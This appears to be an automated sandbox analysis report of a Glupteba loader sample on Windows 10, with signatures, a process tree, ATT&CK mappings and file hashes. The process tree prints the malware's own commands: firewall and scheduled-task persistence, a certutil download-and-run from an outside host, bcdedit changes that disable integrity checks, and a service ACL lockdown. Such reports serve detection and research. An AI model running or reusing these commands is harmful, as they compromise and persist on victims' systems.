Analysis

  • max time kernel
    131s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    25-07-2020 23:34

General

  • Target

    SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

  • Size

    3MB

  • MD5

    0d039208c1658b3fc0c7bd9679a1744d

  • SHA1

    adf1b4f1c00301f325036086a882bdb145002588

  • SHA256

    aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501

  • SHA512

    3e97398f5db4c4549dac9d375e07d4acfc236e477c005d37870b5094d37c27878ab53ad8fadae98fd6f5f3cfc587f0387a2b47a6678234eda3a926797ee23496

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3060
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
      2⤵
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:732
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:3976
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:632
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:800
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1896
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2160
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2180
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2688
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3024
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3428
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3916
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:4048
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3904
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3832
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3040
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3748
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:904
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:424
        • C:\Windows\System32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3484
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          PID:3756
        • C:\Windows\windefender.exe
          "C:\Windows\windefender.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\SysWOW64\sc.exe
              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2608
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:688
  • C:\Windows\windefender.exe
    C:\Windows\windefender.exe
    1⤵
    • Executes dropped EXE
    • Modifies data under HKEY_USERS
    PID:2240

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Command-Line Interface

1
T1059

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

3
T1112

Impair Defenses

1
T1562

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    MD5

    0d039208c1658b3fc0c7bd9679a1744d

    SHA1

    adf1b4f1c00301f325036086a882bdb145002588

    SHA256

    aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501

    SHA512

    3e97398f5db4c4549dac9d375e07d4acfc236e477c005d37870b5094d37c27878ab53ad8fadae98fd6f5f3cfc587f0387a2b47a6678234eda3a926797ee23496

  • C:\Windows\rss\csrss.exe
    MD5

    0d039208c1658b3fc0c7bd9679a1744d

    SHA1

    adf1b4f1c00301f325036086a882bdb145002588

    SHA256

    aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501

    SHA512

    3e97398f5db4c4549dac9d375e07d4acfc236e477c005d37870b5094d37c27878ab53ad8fadae98fd6f5f3cfc587f0387a2b47a6678234eda3a926797ee23496

  • C:\Windows\windefender.exe
    MD5

    0960d00f9971b8003e4bc193737f256e

    SHA1

    60cd089b6f9a73b0f29b511f5a9fc4c15855cba5

    SHA256

    629a413c87fe43667f39e89ec6314ec471bea166444c050375b6b56e1c00907b

    SHA512

    aca3a3d2dac0317c6343ece14e832bcf5372c0aa5fed17865aa8a8181a9eb24a6aa556e021d7862db97224d71f24361cb6594d7cb9a627e5a35a2cb06c031ca1

  • C:\Windows\windefender.exe
    MD5

    0960d00f9971b8003e4bc193737f256e

    SHA1

    60cd089b6f9a73b0f29b511f5a9fc4c15855cba5

    SHA256

    629a413c87fe43667f39e89ec6314ec471bea166444c050375b6b56e1c00907b

    SHA512

    aca3a3d2dac0317c6343ece14e832bcf5372c0aa5fed17865aa8a8181a9eb24a6aa556e021d7862db97224d71f24361cb6594d7cb9a627e5a35a2cb06c031ca1

  • C:\Windows\windefender.exe
    MD5

    0960d00f9971b8003e4bc193737f256e

    SHA1

    60cd089b6f9a73b0f29b511f5a9fc4c15855cba5

    SHA256

    629a413c87fe43667f39e89ec6314ec471bea166444c050375b6b56e1c00907b

    SHA512

    aca3a3d2dac0317c6343ece14e832bcf5372c0aa5fed17865aa8a8181a9eb24a6aa556e021d7862db97224d71f24361cb6594d7cb9a627e5a35a2cb06c031ca1

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    335ee604bc5976ee83b38f3dddfed723

    SHA1

    2511136d8b9d34b521dd6d9d6c9bdd4c34a0e6ac

    SHA256

    8373267ef4dceb7999ccfa9c3c47e75c2623f5aa16a5e46baf2a394faaf5d77f

    SHA512

    87ad9512b45bcfcb0d1287788d88adb2563b003c960eb0e36185cbd2d038d878bee6768a1a6585a2f8ba98f294a8c56762af24f7c8cfc1afaf57e67e9ed5a9ee

  • \Users\Admin\AppData\Local\Temp\osloader.exe
    MD5

    78c581e475d59efdebee2d3f4355f03f

    SHA1

    fda6c1f77f772afaa1b44a44c1fb29ee07434d10

    SHA256

    9f7e7ce0767d327ef0657b02a120f521d27444669587c5ccf282c9b199480aee

    SHA512

    35ed0fc3d9210af3c24a401500aebc8c31d77bb156c447602ca7e91f359931afbf2b69930d80c8fc412b5ba0b9cea8b22b7396f610b4224bbb77d765af042521

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • memory/424-36-0x0000000000000000-mapping.dmp
  • memory/632-15-0x0000000000000000-mapping.dmp
  • memory/732-3-0x0000000000000000-mapping.dmp
  • memory/732-5-0x0000000003070000-0x0000000003071000-memory.dmp
    Filesize

    4KB

  • memory/800-16-0x0000000000000000-mapping.dmp
  • memory/904-35-0x0000000000000000-mapping.dmp
  • memory/1164-17-0x0000000000000000-mapping.dmp
  • memory/1896-23-0x0000000000000000-mapping.dmp
  • memory/2060-41-0x0000000000000000-mapping.dmp
  • memory/2064-10-0x0000000000000000-mapping.dmp
  • memory/2064-14-0x00000000035B0000-0x00000000035B1000-memory.dmp
    Filesize

    4KB

  • memory/2160-24-0x0000000000000000-mapping.dmp
  • memory/2180-25-0x0000000000000000-mapping.dmp
  • memory/2548-46-0x0000000000000000-mapping.dmp
  • memory/2608-47-0x0000000000000000-mapping.dmp
  • memory/2688-26-0x0000000000000000-mapping.dmp
  • memory/2788-8-0x0000000000000000-mapping.dmp
  • memory/3024-27-0x0000000000000000-mapping.dmp
  • memory/3040-33-0x0000000000000000-mapping.dmp
  • memory/3060-1-0x0000000003170000-0x0000000003171000-memory.dmp
    Filesize

    4KB

  • memory/3428-28-0x0000000000000000-mapping.dmp
  • memory/3484-37-0x0000000000000000-mapping.dmp
  • memory/3748-34-0x0000000000000000-mapping.dmp
  • memory/3756-38-0x0000000000000000-mapping.dmp
  • memory/3832-32-0x0000000000000000-mapping.dmp
  • memory/3904-31-0x0000000000000000-mapping.dmp
  • memory/3916-29-0x0000000000000000-mapping.dmp
  • memory/3976-9-0x0000000000000000-mapping.dmp
  • memory/4048-30-0x0000000000000000-mapping.dmp